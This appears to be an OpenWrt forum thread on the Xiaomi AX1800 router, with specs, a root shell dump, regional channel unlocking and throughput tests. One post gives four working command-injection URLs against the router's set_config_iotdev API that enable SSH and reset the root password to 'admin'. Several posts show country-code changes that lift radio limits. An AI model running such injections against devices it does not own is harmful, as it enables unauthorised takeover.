Add support for Xiaomi AX1800 Wifi 6 router

Xiaomi introduced new cheap Wifi 6 router AX1800. It costs about 40-45USD.

Specs

Processor: IPQ6000 4-core A53 1.2GHz CPU
Network acceleration engine: single-core 1.5GHz NPU
ROM: 128MB
Memory: 256MB
2.4GHz WiFi: 2x2 (Maximum support IEEE 802.11ax protocol, theoretical maximum rate up to 574Mbps)
5GHz WiFi: 2x2 (the highest support IEEE 802.11ax protocol, the theoretical maximum rate can reach 1201Mbps)
Antenna: 2 built-in dual-frequency antennas
Protocol standards: IEEE 802.11a / b / g / n / ac / ax, IEEE 802.3 / 3u / 3ab
Certification standard: GB / T9254-: 2008; GB4943.1-2011
2.4GHz Channel: 1,2,3,4,5,6,7,8,9,10,11,12,13
5GHz Channel: 36,40,44,48, 149,153,157,161,165
Modulation:
11b: DSSS: DBPSK (1Mbps), DQPSK (2Mbps), CCK (5.5 / 1 1Mbps)
11a / g: OFDM: BPSK (6 / 9Mbps), QPSK (12 / 18Mbps), 16QAM (24 / 36Mbps), 64QAM (48 / 54Mbps)
11n: MIMO-OFDM: BPSK, QPSK, 16QAM, 64QAM.
Rate set: MCS0 ~ MCS15
11ac: MIMO-OFDM: BPSK, QPSK, 16QAM, 64QAM, 256QAM.
Rate set: MCS0 ~ MCS9 (support 2 streams)
11ax: MIMO-OFDM: BPSK, QPSK, 16QAM, 64QAM, 256QAM, 1024QAM.
Rate set: MCS0 ~ MCS11 (support 2 streams)

Operating system: Smart WiFi operating system based on OpenWRT deeply customized MiWiFi ROM

SSH Access

A guy djinox from one of the russian forums said that he obtained SSH access to it with Xiaomi AX3600 SSH Guide

Is it possible to flash OpenWRT to it? If yes, it's kinda great deal to get a wifi6 router for this kind of money.
P.S. June 10, Xiaomi started to sell Redmi router AX5 with same specs but it's gonna cost a bit less soon.

6 Likes

At the moment, no - you'll have to do the bulk part of the porting work based on the (incomplete) ipq807x target support yourself. While it should be possible to support this device, there's still a lot missing to support any individual device (and a lot of the ipq60xx SOC patches are still in flight on LKML).

zhiping has 807x and 60xx reference boards, but no IPQ6000

Anyone got one of these yet?

Received mine but I'm not able to get SSH access, probably need to downgrade the firmware to a previous version for the exploit to work.

Not sure where to find the download links though.

Gained SSH access on latest firmware following the AX3600 guide.

BusyBox v1.25.1 (2020-06-16 04:11:46 UTC) built-in shell (ash)

 -----------------------------------------------------
       Welcome to XiaoQiang!
 -----------------------------------------------------
  $$$$$$\  $$$$$$$\  $$$$$$$$\      $$\      $$\        $$$$$$\  $$\   $$\
 $$  __$$\ $$  __$$\ $$  _____|     $$ |     $$ |      $$  __$$\ $$ | $$  |
 $$ /  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ /  $$ |$$ |$$  /
 $$$$$$$$ |$$$$$$$  |$$$$$\         $$ |     $$ |      $$ |  $$ |$$$$$  /
 $$  __$$ |$$  __$$< $$  __|        $$ |     $$ |      $$ |  $$ |$$  $$<
 $$ |  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ |  $$ |$$ |\$$\
 $$ |  $$ |$$ |  $$ |$$$$$$$$\       $$$$$$$$$  |       $$$$$$  |$$ | \$$\
 \__|  \__|\__|  \__|\________|      \_________/        \______/ \__|  \__|


root@XiaoQiang:~# cat /proc/cpuinfo
processor       : 0
model name      : ARMv7 Processor rev 4 (v7l)
BogoMIPS        : 48.00
Features        : half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt                                    vfpd32 lpae evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x51
CPU architecture: 7
CPU variant     : 0xa
CPU part        : 0x801
CPU revision    : 4

processor       : 1
model name      : ARMv7 Processor rev 4 (v7l)
BogoMIPS        : 48.00
Features        : half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt                                    vfpd32 lpae evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x51
CPU architecture: 7
CPU variant     : 0xa
CPU part        : 0x801
CPU revision    : 4

processor       : 2
model name      : ARMv7 Processor rev 4 (v7l)
BogoMIPS        : 48.00
Features        : half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt                                    vfpd32 lpae evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x51
CPU architecture: 7
CPU variant     : 0xa
CPU part        : 0x801
CPU revision    : 4

processor       : 3
model name      : ARMv7 Processor rev 4 (v7l)
BogoMIPS        : 48.00
Features        : half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt                                    vfpd32 lpae evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x51
CPU architecture: 7
CPU variant     : 0xa
CPU part        : 0x801
CPU revision    : 4

Hardware        : Generic DT based system
Revision        : 0000
Serial          : 0000000000000000

root@XiaoQiang:~# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 00180000 00020000 "0:SBL1"
mtd1: 00100000 00020000 "0:MIBIB"
mtd2: 00380000 00020000 "0:QSEE"
mtd3: 00080000 00020000 "0:DEVCFG"
mtd4: 00080000 00020000 "0:RPM"
mtd5: 00080000 00020000 "0:CDT"
mtd6: 00080000 00020000 "0:APPSBLENV"
mtd7: 00180000 00020000 "0:APPSBL"
mtd8: 00080000 00020000 "0:ART"
mtd9: 00080000 00020000 "bdata"
mtd10: 00080000 00020000 "crash"
mtd11: 00080000 00020000 "crash_syslog"
mtd12: 02c80000 00020000 "rootfs"
mtd13: 02c80000 00020000 "rootfs_1"
mtd14: 01680000 00020000 "overlay"
mtd15: 00080000 00020000 "cfg_bak"
mtd16: 003a2000 0001f000 "kernel"
mtd17: 01303000 0001f000 "ubi_rootfs"
mtd18: 0118f000 0001f000 "rootfs_data"
mtd19: 012e4000 0001f000 "data"

root@XiaoQiang:~# nvram show
bootcmd=tftp
bootdelay=5
SN=27450/F0PV75116
ethaddr="00:AA:BB:CC:DD:10"
ipaddr=192.168.31.1
serverip=192.168.31.100
stdin=serial
stdout=serial
stderr=serial
uart_en=1
telnet_en=0
wl0_ssid=Xiaomi_DD53_22AC_5G
wl1_ssid=Xiaomi_DD53_22AC
wl0_radio=1
wl1_radio=1
boot_wait=on
no_wifi_dev_times=0
flag_boot_rootfs=1
color=101
flag_boot_type=2
CountryCode=CN
flag_last_success=1
flag_ota_reboot=0
miot_did=353359318
miot_key=sTqLb5A0AKKhQQ1e
nv_wan_type=dhcp
flag_boot_success=1
flag_try_sys1_failed=0
flag_try_sys2_failed=0
Router_unconfigured=0
nv_sys_pwd=15f426f6a8437dc96a9cef93d863e5e9ebba6519
nv_wifi_ssid=Xiaomi_DD53
mode=Router
model=RM1800
nv_wifi_enc=mixed-psk
nv_wifi_pwd=123456
nv_wifi_ssid1=Xiaomi_DD53_5G
nv_wifi_enc1=mixed-psk
nv_wifi_pwd1=123456
restore_defaults=0
ssh_en=1

root@XiaoQiang:~# cat /etc/openwrt_release
DISTRIB_ID='OpenWrt'
DISTRIB_RELEASE='18.06-SNAPSHOT'
DISTRIB_REVISION='unknown'
DISTRIB_TARGET='ipq60xx/MiWiFi'
DISTRIB_ARCH='arm_cortex-a7'
DISTRIB_DESCRIPTION='OpenWrt 18.06-SNAPSHOT unknown'
DISTRIB_TAINTS='no-all busybox'

1 Like

Unlock EU 5GHz channels/frequencies in config dropdown:

root@XiaoQiang:~# nvram get CountryCode
CN

image

nvram set CountryCode=EU
nvram commit
nvram get CountryCode
EU

image

5 Likes

Thanks for the tip! It works, but the MIWifi app has stopped working properly. I had to go back to CN.

2 Likes

I'm not using the app, did the setup directly in the webUI.

Does the app have extra config options??

2 Likes

This thread seems quite stale compared to AX3600. Is there any work being done to run OpenWRT on AX1800? Maybe there are some experimental branches out there?

2 Likes

I think so ! :wink:

1 Like

If so - would be great to get some links.

I am enjoying device so far - but knowing what possibilities OpenWRT would bring - really makes me restless

1 Like

HI,

I unlocked port 22 as written.
Ax1800 is answering on a request SSH, asking for the password.
But I can't type in the password.

Bild_2020-12-07_134603

Any idea ?

Perhaps to use SSH on AX1800 I need Version 1.0.17. for configuration ?
Does anybody knows, where to find it ?

Thank's in advance.

Try this

1 Like

Hi, if you have used the full script the default password is "admin" for "root" user.

Hi guys, i received my first ax1800 last week with 1.0.336 firmware from factory. I can get SSH without problems also a friend with the same router updated to 1.0.378 too using the ax3600 SSH script, not permanent access but i only lost it if i reset to factory defalts.

Once you have SSH access you can use WinSCP with protocol SCP and port 22 to access to the full files structure of the router.

I´m going to share here all test and commands i used to optimize my router until the other units arrive to create a mesh with them.

SSH access:

Log in to your router and copy the stock code, then use it to replace "Stok" in the path of the commands above.

Change the router IP too.

http://"IP"/cgi-bin/luci/;stok="STOK"/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

http://"IP"/cgi-bin/luci/;stok="STOK"/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B

http://"IP"/cgi-bin/luci/;stok="STOK"/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B

http://"IP"/cgi-bin/luci/;stok="STOK"/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

Then you can access via SSH wit PuTTY to port 22, user "root" and password "admin"

By default Country Code and WIFI Code are CN (china) for both wifi bands, for 2,4Ghz the is no problem using this configuration, because all channels (1-13) are available and TX power output reachs 28dbm (630mW), but 5Ghz channels are limited to 36-40-44-48 and 149-153-157-161 with 80Mhz frecuency with 26dbm (398mW) TX power.

Commands:
"nvram get CountryCode"
"uci get wireless.wifi0.country" (5Ghz)
"uci get wireless.wifi1.country" (2.4Ghz)

If you want to get more channels you need to know what are your preferencies and limitation from your country because router is limited to 4 Country Codes but has a lot of WIFI Codes availables. If you change Country Code you need to reboot your router to clean the 5Ghz channels list in the web interface.

Availables Country Codes are EU,HK,TW,KR and CN and depending which one you select more or less channels will be availables to be selected, but not all country codes work fine with all WIFI Codes because if, as example, you only change Country Code to EU, to enabling all channels from 36 to 144, and keep CN as WIFI code, because only channels from 36 to 64 will works even channel 100 and up appears as selectables.

Commands:
"iwinfo wl0 freqlist" (5Ghz)
"iwinfo wifi0 txpowerlist"
"iwinfo wl0 txpowerlist"

"iwinfo wl1 freqlist" (2.4Ghz)
"iwinfo wifi1 txpowerlist"
"iwinfo wl1 txpowerlist"

Now, by default the Country registry is set to Global country 00: DFS-UNSET, it peform the frecuency ranges and what parameters need to aplied in every range by the Country limitations, you can find all information of all countries in google.

Command
iw reg get

global
country 00: DFS-UNSET
1-11 (2402 - 2472 @ 40), (N/A, 20), (N/A)
12-13(2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
14 (2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM, PASSIVE-SCAN
36-48(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
52-64(5250 - 5330 @ 80), (N/A, 20), (0 ms), DFS, AUTO-BW, PASSIVE-SCAN
100-144(5490 - 5730 @ 160), (N/A, 20), (0 ms), DFS, PASSIVE-SCAN
149-165(5735 - 5835 @ 80), (N/A, 20), (N/A), PASSIVE-SCAN
(57240 - 63720 @ 2160), (N/A, 0), (N/A)

2 Likes

@Makunan

Thank you so much, have SSH access now with Version 1.0.378.

If someone can adapt OpenWRT for this device, I will donate to him :wink:

Hi all, good news, without changing Country code or Wifi Code we can use channels from 52 to 64, with max TX power, HT80 and working in mesh environment (you need apply this change to all nodes)

Open a WinSCP connection, go to etc/config/ edit wireless file, at the beginning of the text look for "wifi0" "option channel ´X´" and change it to 52, 56, 60 or 64.

Regards!!

As a test I manually updated the wireless drivers from kvalo's github branch and they seem to work fine. I only use the AX1800 as an AP so I haven't tested much.

https://github.com/kvalo/ath11k-firmware/tree/master/IPQ6018/hw1.0/testing/2.5.0.1.r1/WLAN.HK.2.5.0.1.r1-00004-QCAHKSWPL_SILICONZ-1

Did an quick iperf session with an Intel AX200 adapter:

Connecting to host 192.168.1.15, port 5201
[  5] local 192.168.1.185 port 63072 connected to 192.168.1.15 port 5201
[ ID] Interval           Transfer     Bitrate
[  5]   0.00-1.00   sec  94.2 MBytes   790 Mbits/sec
[  5]   1.00-2.00   sec  99.4 MBytes   831 Mbits/sec
[  5]   2.00-3.00   sec   104 MBytes   871 Mbits/sec
[  5]   3.00-4.00   sec  99.5 MBytes   837 Mbits/sec
[  5]   4.00-5.00   sec   101 MBytes   845 Mbits/sec
[  5]   5.00-6.00   sec   103 MBytes   865 Mbits/sec
[  5]   6.00-7.00   sec  97.1 MBytes   817 Mbits/sec
[  5]   7.00-8.01   sec   105 MBytes   874 Mbits/sec
[  5]   8.01-9.00   sec   104 MBytes   879 Mbits/sec
[  5]   9.00-10.00  sec   100 MBytes   841 Mbits/sec
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate
[  5]   0.00-10.00  sec  1007 MBytes   845 Mbits/sec                  sender
[  5]   0.00-10.09  sec  1005 MBytes   835 Mbits/sec                  receiver

At what distance did you get these measurements?